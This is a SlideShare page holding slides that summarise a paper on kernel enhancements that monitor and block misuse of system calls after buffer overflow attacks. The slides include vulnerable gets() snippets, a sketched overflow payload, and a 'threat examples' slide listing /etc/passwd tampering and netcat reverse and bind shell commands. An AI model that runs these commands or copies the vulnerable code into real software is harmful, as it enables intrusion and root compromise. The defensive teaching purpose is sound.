SlideShare a Scribd company logo

Operating system enhancements to prevent misuse of systems

Download as PPTX, PDF
D
Dayal Dilli

This document discusses enhancements to the operating system to prevent misuse of system calls. It proposes monitoring system calls at the kernel level to detect illegal invocations and block malicious completion of system calls. A reference monitor is used to check arguments of threat level 1 system calls, like those that could modify critical files or spawn shells. New data structures are implemented to authorize access based on an access control database and reference functions. The approach aims to prevent buffer overflow attacks with minimal performance overhead.

1 of 32
Downloaded 11 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Operating System enhancements to prevent misuse of Systems Calls Dayal Dilli ddilli@unb.ca March 25, 2013
Outline • Operating System Security Vulnerabilities and concepts • Buffer overflow exploit • System Calls and Kernel Data structures misuse. • Access control Databases, Audit Files and Reference Monitors. • Performance Evaluation with protection mechanism.
Operating System Security • Protect system from Executing un authorized code. – Protect un authorized execution of Kernel Code. e.g. System Call. – Protect critical memory areas from corruption
Top Operating System Vulnerabilities • Buffer Overflow attacks • Denial of Service attacks • Viruses and Trojans
Buffer overflow • Buffer is a piece of memory – Stack e.g. local variable like arrays – Heap e.g. Dynamically allocated memory
Stack Overflow main() { char buffer[10]; //Stack gets(buffer); puts(buffer); }
Heap Overflow main() { char *buffer; buffer=(char *)malloc(10); //Heap gets(buffer); //buffer more than 10 bytes puts(buffer); }
Exploiting Stack Overflow • Make the content of Buffer[] overflow • Well-craft the content of Buffer to overwrite RET with the address of attackers malicious code. • Malicious code includes spawning a root shell using exec, binding it a port using net cat etc..
Example • Normal Run – Buffer*+ = ‘ABCDEFGH’ – runs properly – 8 bytes • Exploit – Buffer*+ = ‘ABCDEFGHIJKL<address to malicious code>’ – Malicious code contains systems calls like exec that can run a shell.
What happened in the previous slides? • Critical memory areas got corrupted • We used exec system call to spawn a shell • Apart from this, unprotected access to system calls also leads to resource starvation causing Denial of Service attacks.
Prevention of Attacks • Monitoring of system calls made by the processes. • Blocking malicious invocation of system call from completion. • The paper proposes mechanism of interception of system call at Kernel level.
Methodology • Detect illegal invocation of system calls. • Reference Monitor the system calls. • Check the arguments of the system calls. • Implement a light weight change without much changes to the existing Kernel data structures and algorithms.
Approach • Key Terms: – Reference functions – Authorization functions – Access control Database – Access Control Rules
Kernel Enhancements • Not all System calls are malicious. • Identify the subset of system calls for monitoring. • The paper mainly focuses on the prototype implemented to prevent Buffer Overflow based intrusion attacks.
Root Access? • How to get Root Access on the system? – Exploit any vulnerability(e.g. buffer overflow) on any of the running root processes.
Categories of Root Process • Interactive – Process started by super user. Threat level is nil as user has full control of the process. • Background – Daemon programs started at booting, cron jobs. • e.g. httpd, ftp, mysqld, processes started with ‘&’ in the end. • Generally, any process with UID and EUID equaling 0.
System Call Categories and Threat Level
Threat Level Classification • System calls in group 1 – 3 comes under Threat Level 1. • System calls in group 4-9 no so malicious to be misused
System calls with threat level 1 and 2
Threat level – 1 System Calls
Threat examples • Chmod(“/etc/passwd”, 0666) Chown(“/etc/passwd”, intruder, intruder_group) Rename(“/tmp/passwd”,”/etc/passwd”) • Unlink(“/etc/passwd”) Link(“/tmp/passwd”,”/etc/passwd”) • nc <ip> <port> -e /bin/bash • nc –l –p <port> -e /bin/bash
Implementation • New Data structures to implement the Access control Database (ACD). • New System call to read, write and update the ACD and the reference functions.
Authorization and Reference functions • Checks for root privilege and subsequent access to system calls. Data Structures: • setuid_acd - contains root passwd • execve_acd – Struct exe_file_id – Struct executable_file – Struct executable_file_list
Data Structures
Admitted Data structure
sys_setuid_aclm/ aclmng • System call to read and modify ACD. Acts as the common front end for all methods on ACD. • Processes with UID and EUID =0 can only access. • Provides concurrent access between two root process using lock variable write_pid.
Sys_setuid_aclm methods • PUT(exe_file, suid_prog, list) • DELETE(exe_file, suid_prog, list) • GET(exe_file, suid_prog, param) – Param->file_nr, Param->prog_nr from Param->list
check_rootproc • Reference function that authenticates the execution of execve by a root process. – Denial: • EXENA: process not in ACD or not authenticated • EFNA: File not authenticated
Examples • Setuid(0) / su – Checks password • Chmod / Chown – Process: background – File: any regular file/ directory – Checks process/ file from ACD along with Password.
Performance • Only Limited Reduction in Performance • Reasons: – Only 10% of the system calls include Access check. – Only limited number of process execute all check. – No changes with the user mode process. – All data structures need for check are in kernel memory.
Evaluation • Pentium II, 330 MHz with 128 MB RAM, Linux Kernel Version 2.2.12.
Related Works and Conclusion • Linker warning to check dangerous function calls. e.g. gets, strcpy • Non-executable stack. • Stackguard in gcc– commercial tool prevents return address modification using canary word. • Stackshield in gcc- moves return address to un over flow-able location. e.g. beginning of data section.

More Related Content

What's hot (20)

PDF
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
DOCX
Cis 2903 project -202110
AlaJebnoun
 
PDF
Linux SMEP bypass techniques
Vitaly Nikolenko
 
PDF
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
Anne Nicolas
 
PDF
Auditing the Opensource Kernels
Silvio Cesare
 
PPTX
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
Andrew Case
 
PDF
Kernel Recipes 2015: Solving the Linux storage scalability bottlenecks
Anne Nicolas
 
PDF
Larson Macaulay apt_malware_past_present_future_out_of_band_techniques
Scott K. Larson
 
PPTX
Malware analysis using volatility
Yashashree Gund
 
PPTX
Linux SD/MMC device driver
艾鍗科技
 
PDF
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 
PPTX
Hardware Probing in the Linux Kernel
Kernel TLV
 
PDF
Linux kernel debugging
libfetion
 
PPT
Linux Crash Dump Capture and Analysis
Paul V. Novarese
 
PPTX
Syslog
SangJung Woo
 
PDF
Linux Kernel Debugging Essentials workshop
Lubomir Rintel
 
PPTX
Hot potato Privilege Escalation
Sunny Neo
 
PPTX
Metasploit for Web Workshop
Dennis Maldonado
 
PDF
Shell Scripting
Anil Kumar Pugalia
 
PDF
Ex200
teguh imanto
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
Cis 2903 project -202110
AlaJebnoun
 
Linux SMEP bypass techniques
Vitaly Nikolenko
 
Kernel Recipes 2015: Linux Kernel IO subsystem - How it works and how can I s...
Anne Nicolas
 
Auditing the Opensource Kernels
Silvio Cesare
 
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
Andrew Case
 
Kernel Recipes 2015: Solving the Linux storage scalability bottlenecks
Anne Nicolas
 
Larson Macaulay apt_malware_past_present_future_out_of_band_techniques
Scott K. Larson
 
Malware analysis using volatility
Yashashree Gund
 
Linux SD/MMC device driver
艾鍗科技
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 
Hardware Probing in the Linux Kernel
Kernel TLV
 
Linux kernel debugging
libfetion
 
Linux Crash Dump Capture and Analysis
Paul V. Novarese
 
Syslog
SangJung Woo
 
Linux Kernel Debugging Essentials workshop
Lubomir Rintel
 
Hot potato Privilege Escalation
Sunny Neo
 
Metasploit for Web Workshop
Dennis Maldonado
 
Shell Scripting
Anil Kumar Pugalia
 
Ex200
teguh imanto
 

Viewers also liked (20)

PPTX
Chapter 3 security part i auditing operating systems and networks
jayussuryawan
 
ODP
Slug 2009 06 SELinux For Sysadmins
PaulWay
 
PPT
OS Security 2009
Deborah Obasogie
 
PPT
Operating system security (a brief)
cnokia
 
PDF
Kernel Recipes 2015 - Hardened kernels for everyone
Anne Nicolas
 
PDF
Intro to IronWASP
n|u - The Open Security Community
 
PPT
Introduction To SELinux
Rene Cunningham
 
PDF
SELinux basics
Lubomir Rintel
 
ODP
SELinux for Everyday Users
PaulWay
 
PDF
Network Architecture Review Checklist
Eberly Wilson
 
PPT
Chapter 14 - Protection
Wayne Jones Jnr
 
PPTX
COMPUTER SECURITY AND OPERATING SYSTEM
faraz hussain
 
PPTX
Operating system security
Rachel Jeewa
 
PPSX
2 Security Architecture+Design
Alfred Ouyang
 
PPTX
System protection in Operating System
sohaildanish
 
PPTX
Operating System Security
Ramesh Upadhaya
 
PPTX
Operating system security
Sarmad Makhdoom
 
PPTX
Operating system security
Ramesh Ogania
 
PPTX
Security & protection in operating system
Abou Bakr Ashraf
 
PPTX
Operating system and its function
Nikhi Jain
 
Chapter 3 security part i auditing operating systems and networks
jayussuryawan
 
Slug 2009 06 SELinux For Sysadmins
PaulWay
 
OS Security 2009
Deborah Obasogie
 
Operating system security (a brief)
cnokia
 
Kernel Recipes 2015 - Hardened kernels for everyone
Anne Nicolas
 
Intro to IronWASP
n|u - The Open Security Community
 
Introduction To SELinux
Rene Cunningham
 
SELinux basics
Lubomir Rintel
 
SELinux for Everyday Users
PaulWay
 
Network Architecture Review Checklist
Eberly Wilson
 
Chapter 14 - Protection
Wayne Jones Jnr
 
COMPUTER SECURITY AND OPERATING SYSTEM
faraz hussain
 
Operating system security
Rachel Jeewa
 
2 Security Architecture+Design
Alfred Ouyang
 
System protection in Operating System
sohaildanish
 
Operating System Security
Ramesh Upadhaya
 
Operating system security
Sarmad Makhdoom
 
Operating system security
Ramesh Ogania
 
Security & protection in operating system
Abou Bakr Ashraf
 
Operating system and its function
Nikhi Jain
 
Ad

Similar to Operating system enhancements to prevent misuse of systems (20)

PDF
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
PPTX
antoanthongtin_Lesson 3- Software Security (1).pptx
23162024
 
PDF
Buffer overflow tutorial
hughpearse
 
PDF
TDOH x 台科 pwn課程
Weber Tsai
 
PPTX
Services and system calls
sangrampatil81
 
PPTX
Control hijacking
Prachi Gulihar
 
PDF
Linux Kernel Security Overview - KCA 2009
James Morris
 
PPTX
Buffer Overflow by SecArmour
Sec Armour
 
PPTX
Advanced Bulkification Strategies in Apex Triggers
MuhammadMahad31
 
PDF
02_os_structures.pdfbnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
shesnasuneer
 
PDF
[Ruxcon 2011] Post Memory Corruption Memory Analysis
Moabi.com
 
PPTX
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
PPTX
OS SERVICES.pptxJGHHHHHHHHHHHHHHHHGGGGGGGG
shesnasuneer
 
PPT
Dc 12 Chiueh
wollard
 
PDF
unit 2 confinement techniques.pdf
RohitGautam261127
 
PDF
Low Level Exploits
hughpearse
 
PDF
Linux seccomp(2) vs OpenBSD pledge(2)
Giovanni Bechis
 
PDF
Ceh v5 module 20 buffer overflow
Vi Tính Hoàng Nam
 
PPTX
Tranning-2
Ali Hussain
 
PPT
Introduction to System Calls
Vandana Salve
 
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
antoanthongtin_Lesson 3- Software Security (1).pptx
23162024
 
Buffer overflow tutorial
hughpearse
 
TDOH x 台科 pwn課程
Weber Tsai
 
Services and system calls
sangrampatil81
 
Control hijacking
Prachi Gulihar
 
Linux Kernel Security Overview - KCA 2009
James Morris
 
Buffer Overflow by SecArmour
Sec Armour
 
Advanced Bulkification Strategies in Apex Triggers
MuhammadMahad31
 
02_os_structures.pdfbnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
shesnasuneer
 
[Ruxcon 2011] Post Memory Corruption Memory Analysis
Moabi.com
 
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
OS SERVICES.pptxJGHHHHHHHHHHHHHHHHGGGGGGGG
shesnasuneer
 
Dc 12 Chiueh
wollard
 
unit 2 confinement techniques.pdf
RohitGautam261127
 
Low Level Exploits
hughpearse
 
Linux seccomp(2) vs OpenBSD pledge(2)
Giovanni Bechis
 
Ceh v5 module 20 buffer overflow
Vi Tính Hoàng Nam
 
Tranning-2
Ali Hussain
 
Introduction to System Calls
Vandana Salve
 
Ad

Operating system enhancements to prevent misuse of systems

  • 1. Operating System enhancements to prevent misuse of Systems Calls Dayal Dilli [email protected] March 25, 2013
  • 2. Outline • Operating System Security Vulnerabilities and concepts • Buffer overflow exploit • System Calls and Kernel Data structures misuse. • Access control Databases, Audit Files and Reference Monitors. • Performance Evaluation with protection mechanism.
  • 3. Operating System Security • Protect system from Executing un authorized code. – Protect un authorized execution of Kernel Code. e.g. System Call. – Protect critical memory areas from corruption
  • 4. Top Operating System Vulnerabilities • Buffer Overflow attacks • Denial of Service attacks • Viruses and Trojans
  • 5. Buffer overflow • Buffer is a piece of memory – Stack e.g. local variable like arrays – Heap e.g. Dynamically allocated memory
  • 6. Stack Overflow main() { char buffer[10]; //Stack gets(buffer); puts(buffer); }
  • 7. Heap Overflow main() { char *buffer; buffer=(char *)malloc(10); //Heap gets(buffer); //buffer more than 10 bytes puts(buffer); }
  • 8. Exploiting Stack Overflow • Make the content of Buffer[] overflow • Well-craft the content of Buffer to overwrite RET with the address of attackers malicious code. • Malicious code includes spawning a root shell using exec, binding it a port using net cat etc..
  • 9. Example • Normal Run – Buffer*+ = ‘ABCDEFGH’ – runs properly – 8 bytes • Exploit – Buffer*+ = ‘ABCDEFGHIJKL<address to malicious code>’ – Malicious code contains systems calls like exec that can run a shell.
  • 10. What happened in the previous slides? • Critical memory areas got corrupted • We used exec system call to spawn a shell • Apart from this, unprotected access to system calls also leads to resource starvation causing Denial of Service attacks.
  • 11. Prevention of Attacks • Monitoring of system calls made by the processes. • Blocking malicious invocation of system call from completion. • The paper proposes mechanism of interception of system call at Kernel level.
  • 12. Methodology • Detect illegal invocation of system calls. • Reference Monitor the system calls. • Check the arguments of the system calls. • Implement a light weight change without much changes to the existing Kernel data structures and algorithms.
  • 13. Approach • Key Terms: – Reference functions – Authorization functions – Access control Database – Access Control Rules
  • 14. Kernel Enhancements • Not all System calls are malicious. • Identify the subset of system calls for monitoring. • The paper mainly focuses on the prototype implemented to prevent Buffer Overflow based intrusion attacks.
  • 15. Root Access? • How to get Root Access on the system? – Exploit any vulnerability(e.g. buffer overflow) on any of the running root processes.
  • 16. Categories of Root Process • Interactive – Process started by super user. Threat level is nil as user has full control of the process. • Background – Daemon programs started at booting, cron jobs. • e.g. httpd, ftp, mysqld, processes started with ‘&’ in the end. • Generally, any process with UID and EUID equaling 0.
  • 17. System Call Categories and Threat Level
  • 18. Threat Level Classification • System calls in group 1 – 3 comes under Threat Level 1. • System calls in group 4-9 no so malicious to be misused
  • 19. System calls with threat level 1 and 2
  • 20. Threat level – 1 System Calls
  • 21. Threat examples • Chmod(“/etc/passwd”, 0666) Chown(“/etc/passwd”, intruder, intruder_group) Rename(“/tmp/passwd”,”/etc/passwd”) • Unlink(“/etc/passwd”) Link(“/tmp/passwd”,”/etc/passwd”) • nc <ip> <port> -e /bin/bash • nc –l –p <port> -e /bin/bash
  • 22. Implementation • New Data structures to implement the Access control Database (ACD). • New System call to read, write and update the ACD and the reference functions.
  • 23. Authorization and Reference functions • Checks for root privilege and subsequent access to system calls. Data Structures: • setuid_acd - contains root passwd • execve_acd – Struct exe_file_id – Struct executable_file – Struct executable_file_list
  • 26. sys_setuid_aclm/ aclmng • System call to read and modify ACD. Acts as the common front end for all methods on ACD. • Processes with UID and EUID =0 can only access. • Provides concurrent access between two root process using lock variable write_pid.
  • 27. Sys_setuid_aclm methods • PUT(exe_file, suid_prog, list) • DELETE(exe_file, suid_prog, list) • GET(exe_file, suid_prog, param) – Param->file_nr, Param->prog_nr from Param->list
  • 28. check_rootproc • Reference function that authenticates the execution of execve by a root process. – Denial: • EXENA: process not in ACD or not authenticated • EFNA: File not authenticated
  • 29. Examples • Setuid(0) / su – Checks password • Chmod / Chown – Process: background – File: any regular file/ directory – Checks process/ file from ACD along with Password.
  • 30. Performance • Only Limited Reduction in Performance • Reasons: – Only 10% of the system calls include Access check. – Only limited number of process execute all check. – No changes with the user mode process. – All data structures need for check are in kernel memory.
  • 31. Evaluation • Pentium II, 330 MHz with 128 MB RAM, Linux Kernel Version 2.2.12.
  • 32. Related Works and Conclusion • Linker warning to check dangerous function calls. e.g. gets, strcpy • Non-executable stack. • Stackguard in gcc– commercial tool prevents return address modification using canary word. • Stackshield in gcc- moves return address to un over flow-able location. e.g. beginning of data section.